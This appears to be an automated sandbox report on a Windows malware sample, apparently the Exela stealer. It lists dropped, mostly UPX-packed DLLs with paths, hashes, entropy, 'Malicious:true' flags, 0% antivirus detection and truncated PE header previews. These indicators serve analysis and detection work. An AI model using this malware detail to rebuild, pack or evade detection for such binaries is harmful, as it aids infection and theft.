                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1..1..1..IX..1..J..1..J..1..J..1..J..1..J..1.\C..1..1..1..J..1..J..1..J4..1..J..1.Rich.1.................PE..d...k.Vc.........." ...!. ..........@0... ...................................P............`..........................................L..P....I.......@.......................L......................................@<..@...........................................UPX0....................................UPX1..... ... ......................@....rsrc........@......."..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):65920
                                                                                                                                                                                                                                                          Entropy (8bit):6.085964919090515
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Apw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJU:V/5k8cnzeJH9IDQ0K7SyOPx
                                                                                                                                                                                                                                                          MD5:34E49BB1DFDDF6037F0001D9AEFE7D61
                                                                                                                                                                                                                                                          SHA1:A25A39DCA11CDC195C9ECD49E95657A3E4FE3215
                                                                                                                                                                                                                                                          SHA-256:4055D1B9E553B78C244143AB6B48151604003B39A9BF54879DEE9175455C1281
                                                                                                                                                                                                                                                          SHA-512:EDB715654BAAF499CF788BCACD5657ADCF9F20B37B02671ABE71BDA334629344415ED3A7E95CB51164E66A7AA3ED4BF84ACB05649CCD55E3F64036F3178B7856
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q...e...e...e..km...e..ke...e..k....e..kg...e.Rich..e.................PE..d...\.Vc.........." ...!..................................................................`.........................................`...P................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1701240
                                                                                                                                                                                                                                                          Entropy (8bit):7.993696827956843
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:49152:I0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:nziPwCvZalhXOMIzQd
                                                                                                                                                                                                                                                          MD5:DB09C9BBEC6134DB1766D369C339A0A1
                                                                                                                                                                                                                                                          SHA1:C156D9F2D0E80B4CF41794CD9B8B1E8A352E0A0B
                                                                                                                                                                                                                                                          SHA-256:B1AAC1E461174BBAE952434E4DAC092590D72B9832A04457C94BD9BB7EE8AD79
                                                                                                                                                                                                                                                          SHA-512:653A7FFF6A2B6BFFB9EA2C0B72DDB83C9C53D555E798EEA47101B0D932358180A01AF2B9DAB9C27723057439C1EAFFB8D84B9B41F6F9CD1C3C934F1794104D45
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24960
                                                                                                                                                                                                                                                          Entropy (8bit):7.407412042104121
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:5oxUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:exjW1J2pJjNID7GuIYiSyvCPxWEC
                                                                                                                                                                                                                                                          MD5:C39459806C712B3B3242F8376218C1E1
                                                                                                                                                                                                                                                          SHA1:85D254FB6CC5D6ED20A04026BFF1158C8FD0A530
                                                                                                                                                                                                                                                          SHA-256:7CBD4339285D145B422AFA280CEE685258BC659806BE9CF8B334805BC45B29C9
                                                                                                                                                                                                                                                          SHA-512:B727C6D1CD451D658E174161135D3BE48D7EFDA21C775B8145BC527A54D6592BFC50919276C6498D2E2233AC1524C1699F59F0F467CC6E43E5B5E9558C87F49D
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):622976
                                                                                                                                                                                                                                                          Entropy (8bit):7.993556519822549
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:67dpDQ1L3zfmrtWF/azVC9oAnShBJl4cZ1pzgULOX110jt3:cHSzzaQl8VSSh2cZXgULq11y
                                                                                                                                                                                                                                                          MD5:895F001AE969364432372329CAF08B6A
                                                                                                                                                                                                                                                          SHA1:4567FC6672501648B277FE83E6B468A7A2155DDF
                                                                                                                                                                                                                                                          SHA-256:F5DD29E1E99CF8967F7F81487DC624714DCBEC79C1630F929D5507FC95CBFAD7
                                                                                                                                                                                                                                                          SHA-512:05B4559D283EA84174DA72A6C11B8B93B1586B4E7D8CDA8D745C814F8F6DFF566E75F9D7890F32BD9DFE43485244973860F83F96BA39296E28127C9396453261
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.0...0...............................................0............`.............................................L"......................\...........`-..........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc....0...........*..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):300920
                                                                                                                                                                                                                                                          Entropy (8bit):7.985723274612961
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:12Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:12/e6inLOoyVJ/LHQdgipxsMY
                                                                                                                                                                                                                                                          MD5:06A5E52CAF03426218F0C08FC02CC6B8
                                                                                                                                                                                                                                                          SHA1:AE232C63620546716FBB97452D73948EBFD06B35
                                                                                                                                                                                                                                                          SHA-256:118C31FAA930F2849A14C3133DF36420A5832114DF90D77B09CDE0AD5F96F33A
                                                                                                                                                                                                                                                          SHA-512:546B1A01F36D3689B0FDEEDA8B1CE55E7D3451731CA70FFFE6627D542FFF19D7A70E27147CAB1920AAE8BED88272342908D4E9D671D7ABA74ABB5DB398B90718
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.`.......@.. ....P................................................`.............................................X....................P...................................................... ...@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41472
                                                                                                                                                                                                                                                          Entropy (8bit):7.868227278889233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:dU3TLuhvkAahe3LS0HW7A7I57CdTRgbaa34cU29pU:dCFs7S0HW07I57CBRgkcw
                                                                                                                                                                                                                                                          MD5:9A8F969ECDF0C15734C1D582D2AE35D8
                                                                                                                                                                                                                                                          SHA1:A40691E81982F610A062E49A5AD29CFFB5A2F5A8
                                                                                                                                                                                                                                                          SHA-256:874E52CCEAE9A3C967BAC7B628F4144C32E51FC77F519542FC1BAC19045ECDE8
                                                                                                                                                                                                                                                          SHA-512:E0DEB59ABEF7440F30EFFB1AAB6295B5A50C817F685BE30B21A3C453E3099B97FD71984E6CA6A6C6E0021ABB6E906838566F402B00A11813E67A4E00B119619F
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../]..A...A...A.......A...@...A..@...A...D...A...E...A...B...A.[.@...A...@.B.A..`I...A..`A...A..`....A..`C...A.Rich..A.................PE..d....Ype.........." ...%.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98736
                                                                                                                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):35704
                                                                                                                                                                                                                                                          Entropy (8bit):7.6435790825425896
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:PLHYfVmoLOfek+D29R73mq5QQKsapN0ID5nuXYiSyvvNPxWETS:PLHsIfeRD2jaqK/X0ID5nuX7SytPxE
                                                                                                                                                                                                                                                          MD5:1B8CE772A230A5DA8CBDCCD8914080A5
                                                                                                                                                                                                                                                          SHA1:40D4FAF1308D1AF6EF9F3856A4F743046FD0EAD5
                                                                                                                                                                                                                                                          SHA-256:FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
                                                                                                                                                                                                                                                          SHA-512:D2FC21B9F58B57065B337C3513E7E6C3E2243B73C5A230E81C91DAFCB6724B521AD766667848BA8D0A428D530691FFC4020DE6CE9CE1EAA2BF5E15338114A603
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..c...c...c.......c...b...c...f...c...g...c...`...c...b...c.Q.b...c...b...c...n...c...c...c.......c...a...c.Rich..c.........................PE..d...^.Vc.........." ...!.`...........#.......................................P............`..........................................J..P....I..P....@......................DK..$..................................../..@...........................................UPX0....................................UPX1.....`.......R..................@....rsrc........@.......V..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48000
                                                                                                                                                                                                                                                          Entropy (8bit):7.804339649997861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:lwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:qAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
                                                                                                                                                                                                                                                          MD5:80C69A1D87F0C82D6C4268E5A8213B78
                                                                                                                                                                                                                                                          SHA1:BAE059DA91D48EAAC4F1BB45CA6FEEE2C89A2C06
                                                                                                                                                                                                                                                          SHA-256:307359F1B2552B60839385EB63D74CBFE75CD5EFDB4E7CD0BB7D296FA67D8A87
                                                                                                                                                                                                                                                          SHA-512:542CF4BA19DD6A91690340779873E0CB8864B28159F55917F98A192FF9C449ABA2D617E9B2B3932DDFEEE13021706577AB164E5394E0513FE4087AF6BC39D40D
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!............Pd....................................................`.............................................H.................... .. ..................................................Pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):72704
                                                                                                                                                                                                                                                          Entropy (8bit):7.910249809084461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:mmtchbmUHui4ehi47gdUCK41d34AANP8zj6V:/uhKUHuwPMO9y10P83
                                                                                                                                                                                                                                                          MD5:2443ECADDFE40EE5130539024324E7FC
                                                                                                                                                                                                                                                          SHA1:EA74AAF7848DE0A078A1510C3430246708631108
                                                                                                                                                                                                                                                          SHA-256:9A5892AC0CD00C44CD7744D60C9459F302D5984DDB395CAEA52E4D8FD9BCA2DA
                                                                                                                                                                                                                                                          SHA-512:5896AF78CF208E1350CF2C31F913AA100098DD1CF4BAE77CD2A36EC7695015986EC9913DF8D2EBC9992F8F7D48BBA102647DC5EE7F776593AE7BE36F46BD5C93
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." ..... .......@...R...P................................................`..........................................s..l....p.......p..........<...........ht..$....................................^..8...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):58744
                                                                                                                                                                                                                                                          Entropy (8bit):7.8341561308362255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:k3Wq49sE7fzlG5lNXdrYMP0MkeBvGhd0LYXIDQPTl7Syw0Pxv:k3WqKT1GLZdrDkHhOEXIDQPTl6Exv
                                                                                                                                                                                                                                                          MD5:B4C41A4A46E1D08206C109CE547480C7
                                                                                                                                                                                                                                                          SHA1:9588387007A49EC2304160F27376AEDCA5BC854D
                                                                                                                                                                                                                                                          SHA-256:9925AB71A4D74CE0CCC036034D422782395DD496472BD2D7B6D617F4D6DDC1F9
                                                                                                                                                                                                                                                          SHA-512:30DEBB8E766B430A57F3F6649EEB04EB0AAD75AB50423252585DB7E28A974D629EB81844A05F5CB94C1702308D3FEDA7A7A99CB37458E2ACB8E87EFC486A1D33
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.........p...........................................@............`.........................................H<.......9.......0.......................<.......................................(..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):107384
                                                                                                                                                                                                                                                          Entropy (8bit):7.936833941258681
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:gzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:HU/gbHfW6WSWLplCuG
                                                                                                                                                                                                                                                          MD5:E9501519A447B13DCCA19E09140C9E84
                                                                                                                                                                                                                                                          SHA1:472B1AA072454D065DFE415A05036FFD8804C181
                                                                                                                                                                                                                                                          SHA-256:6B5FE2DEA13B84E40B0278D1702AA29E9E2091F9DC09B64BBFF5FD419A604C3C
                                                                                                                                                                                                                                                          SHA-512:EF481E0E4F9B277642652CD090634E1C04702DF789E2267A87205E0FE12B00F1DE6CDD4FAFB51DA01EFA726606C0B57FCB2EA373533C772983FC4777DC0ACC63
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34688
                                                                                                                                                                                                                                                          Entropy (8bit):7.676872991541861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:YA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:YwnzKUQ+p6mcTID5Iub7SyiPx
                                                                                                                                                                                                                                                          MD5:0629BDB5FF24CE5E88A2DDCEDE608AEE
                                                                                                                                                                                                                                                          SHA1:47323370992B80DAFB6F210B0D0229665B063AFB
                                                                                                                                                                                                                                                          SHA-256:F404BB8371618BBD782201F092A3BCD7A96D3C143787EBEA1D8D86DED1F4B3B8
                                                                                                                                                                                                                                                          SHA-512:3FAEFF1A19893257C17571B89963AF37534C189421585EA03DD6A3017D28803E9D08B0E4DACEEE01FFEDA21DA60E68D10083FE7DBDBBDE313A6B489A40E70952
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):86400
                                                                                                                                                                                                                                                          Entropy (8bit):7.925569108441777
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:n8mFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:cO4KV0qKTYhFlupdQ8WLvIDe1Yehx
                                                                                                                                                                                                                                                          MD5:BFCA96ED7647B31DD2919BEDEBB856B8
                                                                                                                                                                                                                                                          SHA1:7D802D5788784F8B6BFBB8BE491C1F06600737AC
                                                                                                                                                                                                                                                          SHA-256:032B1A139ADCFF84426B6E156F9987B501AD42ECFB18170B10FB54DA0157392E
                                                                                                                                                                                                                                                          SHA-512:3A2926B79C90C3153C88046D316A081C8DDFB181D5F7C849EA6AE55CB13C6ADBA3A0434F800C4A30017D2FBAB79D459432A2E88487914B54A897C4301C778551
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25976
                                                                                                                                                                                                                                                          Entropy (8bit):7.49061594497297
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:5y6HNbpr+8C6DJbpwDnIDRtuyYiSyvg7PxWEwm:b9+8FDgDnIDRtuy7SyI7Px7
                                                                                                                                                                                                                                                          MD5:849B4203C5F9092DB9022732D8247C97
                                                                                                                                                                                                                                                          SHA1:ED7BD0D6DCDCFA07F754B98ACF44A7CFE5DCB353
                                                                                                                                                                                                                                                          SHA-256:45BFBAB1D2373CF7A8AF19E5887579B8A306B3AD0C4F57E8F666339177F1F807
                                                                                                                                                                                                                                                          SHA-512:CC618B4FC918B423E5DBDCBC45206653133DF16BF2125FD53BAFEF8F7850D2403564CF80F8A5D4ABB4A8928FF1262F80F23C633EA109A18556D1871AFF81CD39
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w*.|.y.|.y.|.y...y.|.y...x.|.y...x.|.y...x.|.y...x.|.y...x.|.y.|.y.|.yY..x.|.y...x.|.y...x.|.y...y.|.y...x.|.yRich.|.y................PE..d...c.Vc.........." ...!.0..........`.....................................................`.........................................4...`....................`......................................................p...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):31616
                                                                                                                                                                                                                                                          Entropy (8bit):7.623702028566422
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:r1y7nuEu7eOHtaqrSNHrp9LhIDstetYiSyvYPxWEwW:YruEuiON7raHfLhIDstet7SywPx
                                                                                                                                                                                                                                                          MD5:97A40F53A81C39469CC7C8DD00F51B5D
                                                                                                                                                                                                                                                          SHA1:6C3916FE42E7977D8A6B53BFBC5A579ABCF22A83
                                                                                                                                                                                                                                                          SHA-256:11879A429C996FEE8BE891AF2BEC7D00F966593F1E01CA0A60BD2005FEB4176F
                                                                                                                                                                                                                                                          SHA-512:02AF654AB73B6C8BF15A81C0E9071C8FAF064C529B1439A2AB476E1026C860CF7D01472945112D4583E5DA8E4C57F1DF2700331440BE80066DBB6A7E89E1C5AF
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW{..9(..9(..9(.q.(..9(.r8)..9(.r<)..9(.r=)..9(.r:)..9(.r8)..9(..8(..9(S{8)..9(S{=)..9(.r4)..9(.r9)..9(.r.(..9(.r;)..9(Rich..9(........PE..d...e.Vc.........." ...!.P..........@........................................ ............`.........................................x...X...........................................................................P...@...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
